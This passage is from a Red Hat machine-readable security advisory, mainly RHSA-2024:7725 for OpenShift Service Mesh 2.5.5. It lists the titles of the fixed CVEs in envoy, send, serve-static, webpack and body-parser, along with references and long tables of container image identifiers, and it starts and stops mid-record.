"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "body-parser: Denial of Service Vulnerability in body-parser", }, ], }
rhsa-2024_7725
Vulnerability from csaf_redhat
Published
2024-10-07 09:24
Modified
2024-12-18 04:38
Summary
Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.5.5
Notes
Topic
Red Hat OpenShift Service Mesh Containers for 2.5.5
This update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a
detailed severity rating, is available for each vulnerability from the CVE
link(s) in the References section.
Details
Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.
Security Fix(es):
* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule
(CVE-2024-43788)
* envoy: Envoy incorrectly accepts HTTP 200 response for entering upgrade mode (CVE-2024-23326)
* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)
* envoy: Brotli decompressor infinite loop (CVE-2024-32976)
* envoy: abnormal termination when using auto_sni with authority header longer
than 255 characters (CVE-2024-32475)
* envoy: HTTP/2 CPU exhaustion due to CONTINUATION frame flood (CVE-2024-30255)
* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Red Hat OpenShift Service Mesh Containers for 2.5.5\n\nThis update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a\ndetailed severity rating, is available for each vulnerability from the CVE\nlink(s) in the References section.", title: "Topic", }, { category: "general", text: "Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.\n\nSecurity Fix(es):\n* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule\n(CVE-2024-43788)\n* envoy: Envoy incorrectly accepts HTTP 200 response for entering upgrade mode (CVE-2024-23326)\n* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)\n* envoy: Brotli decompressor infinite loop (CVE-2024-32976)\n* envoy: abnormal termination when using auto_sni with authority header longer\nthan 255 characters (CVE-2024-32475)\n* envoy: HTTP/2 CPU exhaustion due to CONTINUATION frame flood (CVE-2024-30255)\n* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2024:7725", url: "https://access.redhat.com/errata/RHSA-2024:7725", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "2259228", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2259228", }, { category: "external", summary: "2272986", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2272986", }, { category: "external", summary: "2276149", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2276149", }, { category: "external", summary: "2283145", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2283145", }, { category: "external", summary: "2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "2311171", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311171", }, { category: "external", summary: "2313683", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313683", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7725.json", }, ], title: "Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.5.5", tracking: { current_release_date: "2024-12-18T04:38:11+00:00", generator: { date: "2024-12-18T04:38:11+00:00", engine: { name: "Red Hat SDEngine", version: "4.2.3", }, }, id: "RHSA-2024:7725", initial_release_date: "2024-10-07T09:24:53+00:00", revision_history: [ { date: "2024-10-07T09:24:53+00:00", number: "1", summary: "Initial version", }, { date: "2024-10-07T09:24:53+00:00", number: "2", summary: "Last updated version", }, { date: "2024-12-18T04:38:11+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "RHOSSM 2.5 for RHEL 8", product: { name: "RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5", product_identification_helper: { cpe: "cpe:/a:redhat:service_mesh:2.5::el8", }, }, }, ], category: "product_family", name: "Red Hat OpenShift Service Mesh", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", product: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", product_id: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", product_identification_helper: { purl: "pkg:oci/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8&tag=1.73.14-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", product_id: "openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.5.5-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", product_id: "openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.73.15-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", product_id: "openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", product: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", product_id: "openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", product_identification_helper: { purl: "pkg:oci/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8&tag=2.5.5-6", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.5.5-3", }, }, }, ], category: "architecture", name: "amd64", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", product: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", product_id: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", product_identification_helper: { purl: "pkg:oci/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8&tag=1.73.14-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", product_id: "openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.5.5-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", product_id: "openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.73.15-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", product_id: "openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", product: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", product_id: "openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", product_identification_helper: { purl: "pkg:oci/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8&tag=2.5.5-6", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.5.5-3", }, }, }, ], category: "architecture", name: "s390x", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", product: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", product_id: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", product_identification_helper: { purl: "pkg:oci/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8&tag=1.73.14-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", product_id: "openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.5.5-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", product_id: "openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.73.15-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", product_id: "openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", product: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", product_id: "openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", product_identification_helper: { purl: "pkg:oci/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8&tag=2.5.5-6", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.5.5-3", }, }, }, ], category: "architecture", name: "ppc64le", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", product: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", product_id: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", product_identification_helper: { purl: "pkg:oci/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8&tag=1.73.14-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", product_id: "openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.5.5-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", product_id: "openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.73.15-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", product_id: "openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", product: { 